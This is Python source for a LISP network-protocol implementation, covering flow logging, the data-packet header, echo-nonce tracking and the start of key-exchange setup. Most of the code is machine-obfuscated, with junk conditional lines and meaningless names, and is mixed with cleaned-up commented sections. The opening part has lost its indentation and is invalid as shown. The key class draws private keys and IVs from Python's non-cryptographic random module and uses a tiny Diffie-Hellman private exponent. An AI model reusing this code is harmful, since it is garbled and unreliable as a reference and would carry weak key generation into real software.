OooOOOoOoo0O0 = bold ( II1i . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( o0OoO0000o , OooOOOoOoo0O0 ) )
return ( IiII1iiI )
if 4 - 4: Oo0Ooo * O0 - oO0o % ooOoO0o + OoOoOO00
if 3 - 3: OoOoOO00
def log_flow ( self , encap ) :
global lisp_flow_log
if 91 - 91: O0 - I11i % I1Ii111
I1ii = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or I1ii ) :
OOoo = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = OOoo ) . start ( )
if ( I1ii ) : os . system ( "rm ./log-flows" )
return
if 87 - 87: OoO0O00 * OoOoOO00 - Oo0Ooo % OOooOOo * i11iIiiIii
if 59 - 59: I1Ii111 + OoooooooOO / I1IiiI / OoooooooOO . iII111i
Oo0OO0000oooo = datetime . datetime . now ( )
lisp_flow_log . append ( [ Oo0OO0000oooo , encap , self . packet , self ] )
if 20 - 20: Ii1I . I1Ii111 % Ii1I
if 5 - 5: OOooOOo + iII111i
 def print_flow ( self , ts , encap , packet ) :

  #
  # Format one flow-log entry (timestamp, direction, outer and inner
  # address/port summaries) into a single "\n"-terminated line.
  # Control packets and encrypted payloads get abbreviated lines.
  # Note: py2-style single-byte string indexing is used below.
  #
  ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
  i1ii11III1 = "{}: {}" . format ( ts , "encap" if encap else "decap" )
  if 3 - 3: oO0o % OoOoOO00 . I1ii11iIi11i / OoO0O00
  iII111iiIII1I = red ( self . outer_source . print_address_no_iid ( ) , False )
  iiIIiii1ii1 = red ( self . outer_dest . print_address_no_iid ( ) , False )
  Ii1i111iI = green ( self . inner_source . print_address ( ) , False )
  iII1ii = green ( self . inner_dest . print_address ( ) , False )
  if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
  if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
   i1ii11III1 += " {}:{} -> {}:{}, LISP control message type {}\n"
   i1ii11III1 = i1ii11III1 . format ( iII111iiIII1I , self . udp_sport , iiIIiii1ii1 , self . udp_dport ,
    self . inner_version )
   return ( i1ii11III1 )
  if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
  if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii

  # A null outer destination means there is no outer header to report.
  if ( self . outer_dest . is_null ( ) == False ) :
   i1ii11III1 += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
   i1ii11III1 = i1ii11III1 . format ( iII111iiIII1I , self . udp_sport , iiIIiii1ii1 , self . udp_dport ,
    len ( packet ) , self . outer_tos , self . outer_ttl )
  if 7 - 7: IiII
  if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo
  if 33 - 33: o0oOOo0O0Ooo * Oo0Ooo
  if 88 - 88: I1Ii111 % OOooOOo - OoOoOO00 - OoOoOO00 . I1IiiI
  if 52 - 52: II111iiii / II111iiii / I1IiiI - I1Ii111

  # Encrypted payload: inner header is unreadable, stop here.
  if ( self . lisp_header . k_bits != 0 ) :
   Oo0OOo = "\n"
   if ( self . packet_error != "" ) :
    Oo0OOo = " ({})" . format ( self . packet_error ) + Oo0OOo
   if 43 - 43: IiII % Ii1I . OOooOOo / Oo0Ooo
   i1ii11III1 += ", encrypted" + Oo0OOo
   return ( i1ii11III1 )
  if 55 - 55: I1ii11iIi11i % OoooooooOO
  if 73 - 73: i1IIi - iII111i % oO0o / i1IIi + II111iiii + I1ii11iIi11i
  if 54 - 54: oO0o
  if 26 - 26: ooOoO0o % OoooooooOO . I1Ii111 * ooOoO0o + II111iiii - I1ii11iIi11i
  if 20 - 20: OoO0O00

  # Skip past the outer IP/UDP/LISP headers to reach the inner packet.
  if ( self . outer_dest . is_null ( ) == False ) :
   packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
  if 99 - 99: Oo0Ooo + OoooooooOO . iII111i + O0
  if 85 - 85: II111iiii - Ii1I
  iIIIIi1iiI = packet [ 9 ] if self . inner_version == 4 else packet [ 6 ]
  iIIIIi1iiI = struct . unpack ( "B" , iIIIIi1iiI ) [ 0 ]
  if 93 - 93: IiII / i11iIiiIii - oO0o + OoO0O00 / i1IIi
  i1ii11III1 += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
  i1ii11III1 = i1ii11III1 . format ( Ii1i111iI , iII1ii , len ( packet ) , self . inner_tos ,
   self . inner_ttl , iIIIIi1iiI )
  if 62 - 62: I1ii11iIi11i / OoooooooOO * I1IiiI - i1IIi
  if 81 - 81: oO0o / O0 * ooOoO0o % OoOoOO00 / O0
  if 85 - 85: OoooooooOO + OoooooooOO
  if 23 - 23: i1IIi

  # TCP/UDP (6/17): report the port pair; ICMP (1): report icmp-seq.
  if ( iIIIIi1iiI in [ 6 , 17 ] ) :
   IIiii1I1I = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
   if ( len ( IIiii1I1I ) == 4 ) :
    IIiii1I1I = socket . ntohl ( struct . unpack ( "I" , IIiii1I1I ) [ 0 ] )
    i1ii11III1 += ", ports {} -> {}" . format ( IIiii1I1I >> 16 , IIiii1I1I & 0xffff )
   if 62 - 62: II111iiii - OoOoOO00 * Ii1I
  elif ( iIIIIi1iiI == 1 ) :
   oO0OO0O = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
   if ( len ( oO0OO0O ) == 2 ) :
    oO0OO0O = socket . ntohs ( struct . unpack ( "H" , oO0OO0O ) [ 0 ] )
    i1ii11III1 += ", icmp-seq {}" . format ( oO0OO0O )
  if 70 - 70: i1IIi % OoO0O00 / i1IIi
  if 30 - 30: OoOoOO00 - i11iIiiIii
  if ( self . packet_error != "" ) :
   i1ii11III1 += " ({})" . format ( self . packet_error )
  if 94 - 94: OoOoOO00 % iII111i
  i1ii11III1 += "\n"
  return ( i1ii11III1 )
if 39 - 39: OoOoOO00 + I1Ii111 % O0
if 26 - 26: ooOoO0o + OoOoOO00
def is_trace ( self ) :
IIiii1I1I = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in IIiii1I1I )
if 17 - 17: I1ii11iIi11i - iII111i % Oo0Ooo * O0 % O0 * OOooOOo
if 6 - 6: I1Ii111
if 46 - 46: II111iiii * I1Ii111
if 23 - 23: i1IIi - O0
if 6 - 6: ooOoO0o % OoooooooOO * I1Ii111 - IiII
if 24 - 24: I11i / iIii1I11I1II1 . OoooooooOO % OoOoOO00 . Ii1I
if 73 - 73: I1Ii111
if 25 - 25: IiII
if 77 - 77: o0oOOo0O0Ooo . iIii1I11I1II1 . OoooooooOO . iIii1I11I1II1
if 87 - 87: II111iiii - OoooooooOO / i1IIi . Ii1I - Oo0Ooo . i11iIiiIii
if 47 - 47: Oo0Ooo % OoO0O00 - ooOoO0o - Oo0Ooo * oO0o
if 72 - 72: o0oOOo0O0Ooo % o0oOOo0O0Ooo + iII111i + I1ii11iIi11i / Oo0Ooo
if 30 - 30: Oo0Ooo + I1IiiI + i11iIiiIii / OoO0O00
if 64 - 64: IiII
if 80 - 80: I1IiiI - i11iIiiIii / OoO0O00 / OoOoOO00 + OoOoOO00
if 89 - 89: O0 + IiII * I1Ii111
#
# Bit masks for the first 32-bit word of the LISP data-packet header
# (used by class lisp_data_header).  Usage visible in this file:
# N is set when a nonce is stored, L when locator-status-bits are
# valid, E marks an echo-nonce request, V a map-version, I an
# instance-id, and the two K bits carry the crypto key-id.  P is only
# displayed by print_header() -- its semantics are not visible here.
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
if 30 - 30: OoOoOO00
class lisp_data_header():
    """
    The 8-byte LISP data-packet header.  first_long holds the flag
    bits, key-id and nonce/map-version value; second_long holds the
    instance-id and locator-status-bits.  Both words are kept in host
    order and converted on encode()/decode().
    """
    def __init__(self):
        self.first_long = 0
        self.second_long = 0
        self.k_bits = 0   # crypto key-id, mirrors bits 24-25 of first_long

    def print_header(self, e_or_d):
        """Return a one-line header summary; e_or_d labels the
        direction (e.g. "encap"/"decap")."""
        nonce = lisp_hex_string(self.first_long & 0xffffff)
        iid_lsb = lisp_hex_string(self.second_long).zfill(8)

        # Upper-case letter when the flag is set, lower-case otherwise.
        flags = ""
        for mask, letter in [(LISP_N_BIT, "N"), (LISP_L_BIT, "L"),
            (LISP_E_BIT, "E"), (LISP_V_BIT, "V"), (LISP_I_BIT, "I"),
            (LISP_P_BIT, "P")]:
            flags += letter if (self.first_long & mask) else letter.lower()
        flags += "K" if (self.k_bits in [2, 3]) else "k"
        flags += "K" if (self.k_bits in [1, 3]) else "k"

        line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " +
            "iid/lsb: {}")
        values = [bold(e_or_d, False)] + list(flags) + [nonce, iid_lsb]
        return (line.format(*values))

    def encode(self):
        """Return the packed 8-byte header in network byte order."""
        return (struct.pack("II", socket.htonl(self.first_long),
            socket.htonl(self.second_long)))

    def decode(self, packet):
        """Unpack the first 8 bytes of packet into this header.
        Returns False when packet is too short, True otherwise."""
        layout = "II"
        size = struct.calcsize(layout)
        if (len(packet) < size): return (False)

        first, second = struct.unpack(layout, packet[:size])
        self.first_long = socket.ntohl(first)
        self.second_long = socket.ntohl(second)
        self.k_bits = (self.first_long & LISP_K_BITS) >> 24
        return (True)

    def key_id(self, key_id):
        """Store a 2-bit crypto key-id in the header."""
        self.first_long = (self.first_long & ~(0x3 << 24)) | \
            ((key_id & 0x3) << 24)
        self.k_bits = key_id

    def nonce(self, nonce):
        """Set the N-bit and store the nonce value."""
        self.first_long |= (LISP_N_BIT | nonce)

    def map_version(self, version):
        """Set the V-bit and store the map-version value."""
        self.first_long |= (LISP_V_BIT | version)

    def instance_id(self, iid):
        """Set the I-bit and store a 24-bit instance-id; iid 0 (the
        default instance) leaves the header untouched."""
        if (iid == 0): return
        self.first_long |= LISP_I_BIT
        self.second_long = (self.second_long & 0xff) | (iid << 8)

    def get_instance_id(self):
        """Return the 24-bit instance-id field."""
        return ((self.second_long >> 8) & 0xffffff)

    def locator_status_bits(self, lsbs):
        """Set the L-bit and store the low 8 locator-status-bits."""
        self.first_long |= LISP_L_BIT
        self.second_long = (self.second_long & 0xffffff00) | (lsbs & 0xff)

    def is_request_nonce(self, nonce):
        """Nonzero when the high bit marks nonce as a request-nonce."""
        return (nonce & 0x80000000)

    def request_nonce(self, nonce):
        """Set the E and N bits and store the low 24 bits of nonce,
        asking the peer to echo it back."""
        self.first_long |= (LISP_E_BIT | LISP_N_BIT | (nonce & 0xffffff))

    def is_e_bit_set(self):
        """Nonzero when the sender requested a nonce echo."""
        return (self.first_long & LISP_E_BIT)

    def get_nonce(self):
        """Return the 24-bit nonce field."""
        return (self.first_long & 0xffffff)
if 61 - 61: ooOoO0o
if 22 - 22: iIii1I11I1II1 / ooOoO0o / I1IiiI - o0oOOo0O0Ooo
if 21 - 21: oO0o . i11iIiiIii * I11i . OOooOOo / OOooOOo
class lisp_echo_nonce():
    """
    Echo-nonce state for one remote RLOC, keyed by its address string.

    Tracks the nonce this node asked the peer to echo (request-nonce), the
    nonce it owes the peer (echo-nonce), and timestamps used for
    rate-limiting and for deciding the RLOC's up/down state.  New instances
    register themselves in the global lisp_nonce_echo_list.  Timestamps are
    seconds-since-epoch from lisp_get_timestamp()/time.time().
    """
    def __init__(self, rloc_str):
        # RLOC kept both as the string key and as a parsed lisp_address.
        self.rloc_str = rloc_str
        self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
        # Nonce sent in request-nonce mode / nonce to be echoed back.
        self.request_nonce_sent = None
        self.echo_nonce_sent = None
        # Event timestamps; None until the event first happens.
        self.last_request_nonce_sent = None
        self.last_new_request_nonce_sent = None
        self.last_echo_nonce_sent = None
        self.last_new_echo_nonce_sent = None
        self.request_nonce_rcvd = None
        self.echo_nonce_rcvd = None
        self.last_request_nonce_rcvd = None
        self.last_echo_nonce_rcvd = None
        self.last_good_echo_nonce_rcvd = None
        # Register this instance in the global per-RLOC table.
        lisp_nonce_echo_list[rloc_str] = self
    if 42 - 42: OoooooooOO / I1Ii111 . o0oOOo0O0Ooo / O0 - IiII * IiII
    if 1 - 1: Ii1I % I1Ii111
    def send_ipc(self, ipc_socket, ipc):
        # Relay an IPC message to the companion process: when this process
        # is the ITR the message goes to "lisp-etr", and vice-versa.
        oo00Oo0 = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
        oO0o0 = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
        ipc = lisp_command_ipc(ipc, oo00Oo0)
        lisp_ipc(ipc, ipc_socket, oO0o0)
    if 28 - 28: Ii1I
    if 36 - 36: I1Ii111 / I1Ii111 % oO0o
    def send_request_ipc(self, ipc_socket, nonce):
        # "R" message: tell the companion we are in request-nonce mode.
        nonce = lisp_hex_string(nonce)
        OoOO0o00OOO0o = "nonce%R%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, OoOO0o00OOO0o)
    if 52 - 52: OoooooooOO / Ii1I - O0 % i1IIi * OOooOOo
    if 92 - 92: Oo0Ooo % OoooooooOO - i11iIiiIii
    def send_echo_ipc(self, ipc_socket, nonce):
        # "E" message: tell the companion we owe the peer this echo-nonce.
        nonce = lisp_hex_string(nonce)
        OoOO0o00OOO0o = "nonce%E%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, OoOO0o00OOO0o)
    if 46 - 46: Oo0Ooo
    if 99 - 99: OoO0O00 - ooOoO0o * O0 * I1ii11iIi11i * iIii1I11I1II1 - iIii1I11I1II1
    def receive_request(self, ipc_socket, nonce):
        # Peer asked us to echo 'nonce': record it and, unless running as an
        # RTR (single process), relay it once per distinct nonce.
        IIIi1ii1i1 = self.request_nonce_rcvd
        self.request_nonce_rcvd = nonce
        self.last_request_nonce_rcvd = lisp_get_timestamp()
        if (lisp_i_am_rtr): return
        if (IIIi1ii1i1 != nonce): self.send_request_ipc(ipc_socket, nonce)
    if 6 - 6: iIii1I11I1II1 * II111iiii
    if 38 - 38: I1IiiI
    def receive_echo(self, ipc_socket, nonce):
        # Accept an echo only if it matches our outstanding request-nonce;
        # process each distinct echoed nonce once.
        if (self.request_nonce_sent != nonce): return
        self.last_echo_nonce_rcvd = lisp_get_timestamp()
        if (self.echo_nonce_rcvd == nonce): return
        if 42 - 42: o0oOOo0O0Ooo
        self.echo_nonce_rcvd = nonce
        if (lisp_i_am_rtr): return
        self.send_echo_ipc(ipc_socket, nonce)
    if 8 - 8: i11iIiiIii / ooOoO0o
    if 33 - 33: I1Ii111 * IiII - O0 + I1IiiI / IiII
    def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
        """
        Return the nonce to place in the next packet to this RLOC: an owed
        echo-nonce (request bit clear), a request-nonce with the high-order
        bit 0x80000000 set, or None right after request-nonce mode times
        out.
        """
        if 19 - 19: i1IIi % II111iiii
        if 85 - 85: IiII - o0oOOo0O0Ooo % OOooOOo - II111iiii
        if 56 - 56: Ii1I * i11iIiiIii
        if 92 - 92: II111iiii - O0 . I1Ii111
        if 59 - 59: OoOoOO00
        # Both sides requesting at once: break the tie on address order so
        # only one side stays in request-nonce mode.
        if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
            iiII1iiI = lisp_myrlocs[0] if remote_rloc.is_ipv4() else lisp_myrlocs[1]
            if 57 - 57: i11iIiiIii - I11i / ooOoO0o / o0oOOo0O0Ooo * i11iIiiIii * o0oOOo0O0Ooo
            if 28 - 28: OoooooooOO % O0 - OOooOOo / o0oOOo0O0Ooo / I1IiiI
            if (remote_rloc.address > iiII1iiI.address):
                OO0o = "exit"
                self.request_nonce_sent = None
            else:
                OO0o = "stay in"
                self.echo_nonce_sent = None
            if 41 - 41: II111iiii * IiII / OoO0O00 . oO0o
            if 50 - 50: OoooooooOO + iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii . ooOoO0o
            Ooo0OO00oo = bold("collision", False)
            I1111III111ii = red(iiII1iiI.print_address_no_iid(), False)
            i11iII1IiI = red(remote_rloc.print_address_no_iid(), False)
            lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(Ooo0OO00oo,
                I1111III111ii, i11iII1IiI, OO0o))
        if 21 - 21: IiII * OoOoOO00 - I1Ii111
        if 44 - 44: OoooooooOO + Ii1I
        if 84 - 84: i1IIi - II111iiii . OoooooooOO / OoOoOO00 % Ii1I
        if 7 - 7: i1IIi / IiII / iII111i
        if 97 - 97: OoO0O00 + iIii1I11I1II1
        # An echo is owed: return it one-shot, with the request bit clear.
        if (self.echo_nonce_sent != None):
            oOO000 = self.echo_nonce_sent
            oOo = bold("Echoing", False)
            lprint("{} nonce 0x{} to {}".format(oOo,
                lisp_hex_string(oOO000), red(self.rloc_str, False)))
            self.last_echo_nonce_sent = lisp_get_timestamp()
            self.echo_nonce_sent = None
            return (oOO000)
        if 79 - 79: ooOoO0o + oO0o - II111iiii . Oo0Ooo
        if 26 - 26: IiII
        if 52 - 52: O0 + ooOoO0o
        if 11 - 11: i1IIi / I1Ii111 * I1ii11iIi11i * I1Ii111 * ooOoO0o - i11iIiiIii
        if 96 - 96: I1ii11iIi11i % I1ii11iIi11i
        if 1 - 1: I1IiiI . Ii1I
        if 26 - 26: oO0o - ooOoO0o % Oo0Ooo - oO0o + IiII
        # Time out request-nonce mode after LISP_NONCE_ECHO_INTERVAL.
        oOO000 = self.request_nonce_sent
        I1IIII = self.last_request_nonce_sent
        if (oOO000 and I1IIII != None):
            if (time.time() - I1IIII >= LISP_NONCE_ECHO_INTERVAL):
                self.request_nonce_sent = None
                lprint("Stop request-nonce mode for {}, nonce 0x{}".format(red(self.rloc_str, False), lisp_hex_string(oOO000)))
                if 69 - 69: IiII
                return (None)
        if 24 - 24: OoO0O00 / O0 * ooOoO0o % iIii1I11I1II1 + i1IIi % O0
        if 26 - 26: ooOoO0o + IiII - O0 * oO0o * II111iiii . I1ii11iIi11i
        if 75 - 75: OoOoOO00 / OoooooooOO / I11i % OoOoOO00 * Ii1I * IiII
        if 11 - 11: I1ii11iIi11i / OOooOOo . Ii1I * I1ii11iIi11i
        if 17 - 17: I1ii11iIi11i * OoooooooOO % i1IIi % OoooooooOO . iII111i
        if 20 - 20: OoO0O00 . oO0o
        if 4 - 4: Oo0Ooo % Ii1I % OoO0O00 * iII111i % OoooooooOO
        if 38 - 38: OoooooooOO . iII111i
        if 43 - 43: OoooooooOO
        # No outstanding request-nonce: start request mode (unless we asked
        # recently), telling the companion process when we are the ITR.
        if (oOO000 == None):
            oOO000 = lisp_get_data_nonce()
            if (self.recently_requested()): return (oOO000)
            if 8 - 8: OOooOOo + I11i . I11i
            self.request_nonce_sent = oOO000
            lprint("Start request-nonce mode for {}, nonce 0x{}".format(red(self.rloc_str, False), lisp_hex_string(oOO000)))
            if 89 - 89: I1ii11iIi11i * I1ii11iIi11i * OoOoOO00 / iII111i
            self.last_new_request_nonce_sent = lisp_get_timestamp()
            if 60 - 60: OoO0O00 / iII111i / I1IiiI + oO0o
            if 93 - 93: OoooooooOO * Ii1I / O0 + Ii1I - iIii1I11I1II1
            if 6 - 6: IiII - Oo0Ooo - I11i - O0 % OoooooooOO
            if 88 - 88: O0 / o0oOOo0O0Ooo * o0oOOo0O0Ooo . o0oOOo0O0Ooo . O0
            if 27 - 27: i11iIiiIii % iII111i + Ii1I . OOooOOo
            # Only the ITR informs its companion; others return directly.
            if (lisp_i_am_itr == False): return (oOO000 | 0x80000000)
            self.send_request_ipc(ipc_socket, oOO000)
        else:
            lprint("Continue request-nonce mode for {}, nonce 0x{}".format(red(self.rloc_str, False), lisp_hex_string(oOO000)))
        if 9 - 9: OoO0O00
        if 43 - 43: Ii1I . OOooOOo + I1IiiI * i11iIiiIii
        if 2 - 2: OOooOOo
        if 3 - 3: I1IiiI . iII111i % O0 - ooOoO0o / O0
        if 79 - 79: Ii1I + oO0o % ooOoO0o % I1IiiI
        if 68 - 68: II111iiii - OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo % II111iiii
        if 53 - 53: iII111i . oO0o / Oo0Ooo . OoO0O00 . i11iIiiIii
        # Tag the returned nonce as a request (high-order bit set).
        self.last_request_nonce_sent = lisp_get_timestamp()
        return (oOO000 | 0x80000000)
    if 60 - 60: II111iiii
    if 25 - 25: Oo0Ooo + o0oOOo0O0Ooo - OoO0O00
    def request_nonce_timeout(self):
        # True when a request-nonce has been outstanding for at least
        # LISP_NONCE_ECHO_INTERVAL and no echo was ever received.
        if (self.request_nonce_sent == None): return (False)
        if (self.request_nonce_sent == self.echo_nonce_rcvd): return (False)
        if 57 - 57: II111iiii . i1IIi
        oO000o0Oo00 = time.time() - self.last_request_nonce_sent
        I11Ii1 = self.last_echo_nonce_rcvd
        return (oO000o0Oo00 >= LISP_NONCE_ECHO_INTERVAL and I11Ii1 == None)
    if 63 - 63: i1IIi
    if 42 - 42: oO0o - i11iIiiIii % oO0o - I1Ii111 * O0 / II111iiii
    def recently_requested(self):
        # True when a request-nonce was sent within the last interval.
        I11Ii1 = self.last_request_nonce_sent
        if (I11Ii1 == None): return (False)
        if 5 - 5: Oo0Ooo
        oO000o0Oo00 = time.time() - I11Ii1
        return (oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL)
    if 84 - 84: I1ii11iIi11i
    if 53 - 53: oO0o
    def recently_echoed(self):
        # Not in request-nonce mode => treat the RLOC as healthy.
        if (self.request_nonce_sent == None): return (True)
        if 26 - 26: I1Ii111 / I1Ii111 + Oo0Ooo - o0oOOo0O0Ooo % II111iiii . OoooooooOO
        if 7 - 7: II111iiii - I1ii11iIi11i / I11i % OoooooooOO + i1IIi
        if 42 - 42: I11i + i1IIi - Ii1I / IiII . iII111i
        if 30 - 30: Oo0Ooo + Ii1I % i11iIiiIii * i1IIi + I1IiiI % OOooOOo
        # A good echo within the interval counts as echoed.
        I11Ii1 = self.last_good_echo_nonce_rcvd
        if (I11Ii1 == None): I11Ii1 = 0
        oO000o0Oo00 = time.time() - I11Ii1
        if (oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL): return (True)
        if 30 - 30: i11iIiiIii * Oo0Ooo . II111iiii + I1ii11iIi11i / o0oOOo0O0Ooo % I1Ii111
        if 78 - 78: I1ii11iIi11i + OoooooooOO - I1IiiI * OoOoOO00 * iII111i
        if 7 - 7: OOooOOo . IiII . I1Ii111 / Ii1I / Oo0Ooo
        if 83 - 83: I11i / Oo0Ooo
        if 23 - 23: iIii1I11I1II1
        if 10 - 10: I11i - o0oOOo0O0Ooo % OoooooooOO - I1ii11iIi11i
        # Otherwise allow a grace period measured from when the current
        # request-nonce mode was started.
        I11Ii1 = self.last_new_request_nonce_sent
        if (I11Ii1 == None): I11Ii1 = 0
        oO000o0Oo00 = time.time() - I11Ii1
        return (oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL)
    if 64 - 64: OoO0O00 / I1IiiI
    if 23 - 23: I11i * I1Ii111 * o0oOOo0O0Ooo - I1IiiI % OoOoOO00 + o0oOOo0O0Ooo
    def change_state(self, rloc):
        # Take the RLOC down when echoes stopped coming back; bring it back
        # up (to retry request-nonce mode) after the quiet period.
        if (rloc.up_state() and self.recently_echoed() == False):
            I1ii11ii1iiI = bold("down", False)
            oO0oo0 = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
            lprint("Take {} {}, last good echo: {}".format(red(self.rloc_str, False), I1ii11ii1iiI, oO0oo0))
            if 12 - 12: i11iIiiIii + i1IIi - Ii1I + O0 . I1IiiI
            rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
            rloc.last_state_change = lisp_get_timestamp()
            return
        if 8 - 8: o0oOOo0O0Ooo
        if 78 - 78: i1IIi - Oo0Ooo
        if (rloc.no_echoed_nonce_state() == False): return
        if 48 - 48: Ii1I - OoooooooOO + I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 . I1IiiI
        if (self.recently_requested() == False):
            i11iII11I1III = bold("up", False)
            lprint("Bring {} {}, retry request-nonce mode".format(red(self.rloc_str, False), i11iII11I1III))
            if 44 - 44: OOooOOo . iIii1I11I1II1 . i11iIiiIii % OoooooooOO . ooOoO0o
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()
    if 53 - 53: IiII + O0
    if 88 - 88: OoooooooOO
    if 46 - 46: O0 % OoooooooOO
    def print_echo_nonce(self):
        # Multi-line status string used by the show/display pages.
        I1IiII = lisp_print_elapsed(self.last_request_nonce_sent)
        o0O00o0o = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
        if 31 - 31: ooOoO0o % I1IiiI % IiII / I1Ii111
        OoOOoo = lisp_print_elapsed(self.last_echo_nonce_sent)
        I1OooO00Oo = lisp_print_elapsed(self.last_request_nonce_rcvd)
        IiII1iiI = space(4)
        if 81 - 81: I1ii11iIi11i - OoO0O00 * oO0o
        Oo0Ooo0O0 = "Nonce-Echoing:\n"
        Oo0Ooo0O0 += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n").format(IiII1iiI, I1IiII, IiII1iiI, o0O00o0o)
        if 81 - 81: iII111i - Ii1I - OOooOOo % IiII % o0oOOo0O0Ooo . iIii1I11I1II1
        Oo0Ooo0O0 += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}").format(IiII1iiI, I1OooO00Oo, IiII1iiI, OoOOoo)
        if 79 - 79: I1ii11iIi11i - I1ii11iIi11i . Ii1I / IiII
        if 57 - 57: ooOoO0o * iIii1I11I1II1 * iII111i * Ii1I / Ii1I
        return (Oo0Ooo0O0)
if 43 - 43: O0 * i11iIiiIii - OoooooooOO - oO0o
if 46 - 46: oO0o * i1IIi / I1ii11iIi11i
if 100 - 100: I1IiiI - OOooOOo
if 91 - 91: o0oOOo0O0Ooo * I1ii11iIi11i - iII111i . II111iiii
if 1 - 1: OOooOOo + I1Ii111 * I1ii11iIi11i
if 44 - 44: iII111i
if 79 - 79: o0oOOo0O0Ooo % OOooOOo . O0
if 56 - 56: oO0o + i1IIi * iII111i - O0
if 84 - 84: iII111i % I1IiiI / iIii1I11I1II1 * Ii1I * iIii1I11I1II1 + I1ii11iIi11i
class lisp_keys():
    """
    Key-exchange and crypto state for one LISP security association.

    Supports curve25519 ECDH (cipher suites chacha / AES-GCM / AES-CBC) or
    classic 1024-bit modular Diffie-Hellman, derives the encrypt and ICV
    keys from the shared secret via HMAC-SHA256, and encodes/decodes the
    Security-Type LCAF that carries the public key.  Python 2 code: uses
    dict.has_key, long, and byte-strings as str.
    """
    def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
        do_poly=use_poly):
        # NOTE: do_chacha/do_poly defaults are snapshots of the module
        # globals use_chacha/use_poly taken at class-definition time.
        self.uptime = lisp_get_timestamp()
        self.last_rekey = None
        self.rekey_count = 0
        self.use_count = 0
        self.key_id = key_id
        # Start from the classic 1024-bit DH suite; upgraded below.
        self.cipher_suite = LISP_CS_1024
        self.dh_g_value = LISP_CS_1024_G
        self.dh_p_value = LISP_CS_1024_P
        self.curve25519 = None
        self.cipher_suite_string = ""
        if (do_curve):
            if (do_chacha):
                self.cipher_suite = LISP_CS_25519_CHACHA
                self.cipher_suite_string = "chacha"
            elif (os.getenv("LISP_USE_AES_GCM") != None):
                self.cipher_suite = LISP_CS_25519_GCM
                self.cipher_suite_string = "aes-gcm"
            else:
                self.cipher_suite = LISP_CS_25519_CBC
                self.cipher_suite_string = "aes-cbc"
            if 78 - 78: IiII / iII111i * Ii1I . OOooOOo . oO0o - I1Ii111
            # 128-bit private key, hex-encoded for the curve25519 library.
            # NOTE(review): random is not a CSPRNG; secrets/os.urandom would
            # be stronger for key material — flagging only.
            self.local_private_key = random.randint(0, 2 ** 128 - 1)
            ii1i1I1111ii = lisp_hex_string(self.local_private_key).zfill(32)
            self.curve25519 = curve25519.Private(ii1i1I1111ii)
        else:
            # Small private exponent for the 1024-bit DH fallback.
            self.local_private_key = random.randint(0, 0x1fff)
        if 39 - 39: ooOoO0o . i1IIi + OoooooooOO . iII111i - i11iIiiIii % I1Ii111
        self.local_public_key = self.compute_public_key()
        self.remote_public_key = None
        self.shared_key = None
        self.encrypt_key = None
        self.icv_key = None
        # ICV algorithm: poly1305 when requested, else HMAC-SHA256.
        self.icv = poly1305 if do_poly else hashlib.sha256
        self.iv = None
        self.get_iv()
        self.do_poly = do_poly
    if 38 - 38: oO0o
    if 9 - 9: I11i . OoO0O00 . oO0o / OoooooooOO
    def copy_keypair(self, key):
        # Share 'key's local keypair; remote/derived keys are not copied.
        self.local_private_key = key.local_private_key
        self.local_public_key = key.local_public_key
        self.curve25519 = key.curve25519
    if 59 - 59: iIii1I11I1II1 + i1IIi % II111iiii
    if 2 - 2: II111iiii + I11i . OoO0O00
    def get_iv(self):
        """Advance and return the per-association IV, packed to the size the
        active cipher suite expects (8 bytes chacha, 12 GCM, 16 otherwise)."""
        if (self.iv == None):
            self.iv = random.randint(0, LISP_16_128_MASK)
        else:
            self.iv += 1
        if 14 - 14: OOooOOo * I1IiiI - I1ii11iIi11i
        i1Oo = self.iv
        if (self.cipher_suite == LISP_CS_25519_CHACHA):
            i1Oo = struct.pack("Q", i1Oo & LISP_8_64_MASK)
        elif (self.cipher_suite == LISP_CS_25519_GCM):
